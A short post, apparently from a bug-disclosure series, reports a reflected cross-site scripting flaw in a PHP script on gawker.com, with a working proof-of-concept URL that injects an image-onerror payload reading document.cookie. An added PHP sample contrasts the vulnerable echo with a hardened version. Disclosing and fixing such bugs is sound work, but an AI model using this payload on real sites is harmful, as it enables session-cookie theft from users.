For our first bug of the day, we need look no further than the first PHP script in the web root.
In fact, we don’t need to read more than 3 lines of code to find it. Unescaped user inputs are being echoed out to the page. This means XSS. This means pwnage.
http://gawker.com/at.js.php?country=%3Cimg%20src%3D.%20onerror%3Dalert%28document.cookie%29%20%3E
-mckt
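The bug class described above, shown next to a hardened form. This is an added example, not code from the original post and not Gawker's source; the emitted variable name (at_country) and the assumption that country should be a two-letter code are illustrative.

```php
<?php
// Added example, not Gawker's source: the emitted variable name (at_country)
// and the two-letter country-code rule are assumptions.

// Pattern the post describes: the parameter is echoed verbatim. PHP serves
// text/html unless told otherwise, so markup in the value is rendered.
function render_vulnerable(string $country): string
{
    return "var at_country = '" . $country . "';";
}

// Hardened: validate the expected shape, then encode for the JavaScript
// string context the value lands in.
function render_hardened(string $country): string
{
    if (!preg_match('/\A[A-Za-z]{2}\z/', $country)) {
        $country = '';  // reject anything that is not a two-letter code
    }
    // JSON_HEX_* emits <, >, &, ' and " as \uXXXX escapes, so the value
    // cannot close the string literal or an enclosing <script> element.
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    return 'var at_country = ' . json_encode(strtoupper($country), $flags) . ';';
}

if (PHP_SAPI === 'cli') {
    // Constructed input: the value of country= in the URL above, URL-decoded.
    $probe = '<img src=. onerror=alert(document.cookie) >';
    echo render_vulnerable($probe), "\n";  // markup passes through intact
    echo render_hardened($probe), "\n";    // fails validation, emitted empty
    echo render_hardened('de'), "\n";      // valid code, normalised to upper case
} else {
    // Declare the real type and forbid sniffing, so the body is never
    // interpreted as HTML even if an encoding step is missed later.
    header('Content-Type: application/javascript; charset=utf-8');
    header('X-Content-Type-Options: nosniff');
    $raw = $_GET['country'] ?? '';
    // ?country[]=x arrives as an array; treat non-strings as empty.
    echo render_hardened(is_string($raw) ? $raw : '');
}
```

Run from the command line, it prints the vulnerable and hardened output for the same input; served by a web server, it takes the hardened path only.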
[…] GBOTD#1 is a XSS found in the first 3 lines of the first file: http://gawker.com/at.js.php?country=%3Cimg%20src%3D.%20onerror%3Dalert%28document.cookie%29%20%3E […]